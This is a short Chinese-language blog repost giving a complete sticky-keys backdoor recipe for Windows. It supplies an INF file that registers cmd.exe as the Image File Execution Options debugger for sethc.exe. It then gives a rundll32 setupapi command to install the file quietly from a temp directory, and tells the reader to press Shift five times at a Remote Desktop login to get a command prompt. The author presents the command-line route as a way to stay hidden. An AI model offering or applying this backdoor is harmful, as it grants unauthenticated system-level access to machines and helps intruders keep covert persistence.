将下面的代码保存成inf文件
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe
然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf
然后远程登录3389,按5下shift即可跳出cmd.exe
为什么要命令行?隐蔽性?大家自行掂量
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/457220,如需转载请自行联系原作者
